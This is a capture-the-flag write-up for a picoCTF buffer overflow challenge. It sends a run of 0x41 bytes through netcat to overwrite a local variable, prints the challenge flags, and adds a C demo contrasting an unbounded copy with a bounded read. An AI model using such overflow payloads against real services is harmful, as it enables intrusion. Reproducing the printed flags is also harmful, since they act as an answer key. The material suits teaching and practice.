## Main Point

### echo+netcat

`echo 'test' | netcat server 7`

ref: https://unix.stackexchange.com/questions/332163/netcat-send-text-to-echo-service-read-reply-then-exit

#### echo -e

The `-e` option makes `echo` interpret backslash escapes (such as `\x41`) instead of printing them literally, which changes the format of the output. (source: https://www.linuxjournal.com/content/echo-command#:~:text=The%20%2De%20option%20allows%20you,behavior%20as%20actually%20pressing%20backspace.)

## Writeup

1. In the source code we can see `char input[16];`, which means that `input` is 16 bytes long. The challenge description says *overflow the buffer and modify the other local variable*, so our input has to be longer than 16 bytes.
2. The second hint says *When you change num, view the value as hexadecimal.*, so send the string `'\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41'` (17 `\x41` in total) with the command `echo '\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41' | nc saturn.picoctf.net 52421`.
3. You'll find that this is still not long enough to reach `num`, so add one `\x41` at a time; it succeeds with 25 `\x41`, which looks like this:

```bash
┌──(kali㉿kali)-[~]
└─$ echo '\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41' | nc saturn.picoctf.net 52421
Enter a string: num is 65
You win!
picoCTF{l0c4l5_1n_5c0p3_ee58441a}
```

\*NOTE: `echo -e '\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41' | nc saturn.picoctf.net 52421` (with the `-e` parameter added) works as well. The zsh prompt shown above has a builtin `echo` that already interprets `\x41` escapes, which is why the version without `-e` also worked; under bash you need `-e`.

4. If you interact with the server (or the local binary) directly, type `A` (ASCII 65, i.e. `0x41`) instead:

```shell
┌──(kali㉿kali)-[~/code/GDBed_files]
└─$ ./local-target
Enter a string: AAAAAAAAAAAAAAAAA
num is 64
Bye!

┌──(kali㉿kali)-[~/code/GDBed_files]
└─$ ./local-target
Enter a string: AAAAAAAAAAAAAAAAAAAAAAAAA
num is 65
You win!
picoCTF{i_am_a_fake_flag}

┌──(kali㉿kali)-[~/code/GDBed_files]
└─$ nc saturn.picoctf.net 49377
Enter a string: AAAAAAAAAAAAAAAAAAAAAAAAA
num is 65
You win!
picoCTF{l0c4l5_1n_5c0p3_ee58441a}
```
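The runs above tell us where `num` sits relative to `input`: 17 bytes leave `num` at 64, while 25 bytes set it to 65 (`0x41`), so the low byte of `num` is 24 bytes past the start of `input[]`. The following is an added example, not the challenge's own source: it models that frame as a struct (the 8-byte gap and the little-endian layout are assumptions inferred from the outputs), reproduces the unbounded read the writeup exploits, and shows the bounded `fgets`-style read that keeps `num` untouched.

```c
#include <stdio.h>
#include <string.h>

/* Model of the challenge's stack frame. The 8-byte gap is an assumption
 * inferred from the writeup's runs: 17 'A's leave num at 64, 25 reach it,
 * so num's low byte sits at offset 24. Little-endian is assumed. */
struct frame {
    char input[16];
    char gap[8];
    int  num;
};

/* Unsafe pattern: the line is copied with no regard for sizeof input, so
 * bytes 16.. spill into gap[] and then into num. It is capped at the frame
 * size only so this demo stays inside one object; the real bug has no cap. */
int unsafe_read_num(const char *line) {
    struct frame f = { {0}, {0}, 64 };
    size_t n = strcspn(line, "\n");       /* the server stops at the newline */
    if (n > sizeof f) n = sizeof f;
    memcpy(&f, line, n);                  /* overwrites everything in its path */
    return f.num;
}

/* Hardened: bounded copy, equivalent to fgets(input, sizeof input, stdin).
 * At most 15 bytes plus the terminator land in input[]; num is never touched. */
int safe_read_num(const char *line) {
    struct frame f = { {0}, {0}, 64 };
    size_t n = strcspn(line, "\n");
    if (n > sizeof f.input - 1) n = sizeof f.input - 1;
    memcpy(f.input, line, n);
    f.input[n] = '\0';
    return f.num;
}

/* Build the writeup's payload: count copies of 'A' (0x41) plus a newline. */
const char *a_payload(size_t count) {
    static char buf[64];
    if (count > sizeof buf - 2) count = sizeof buf - 2;
    memset(buf, 'A', count);
    buf[count] = '\n';
    buf[count + 1] = '\0';
    return buf;
}

int main(void) {
    printf("17 A's, unsafe read: num is %d\n", unsafe_read_num(a_payload(17)));
    printf("25 A's, unsafe read: num is %d\n", unsafe_read_num(a_payload(25)));
    printf("25 A's, safe read:   num is %d\n", safe_read_num(a_payload(25)));
    return 0;
}
```

A 26th `A` would land in the second byte of `num` and give `0x4141`, which is why the hint asks you to view `num` in hexadecimal.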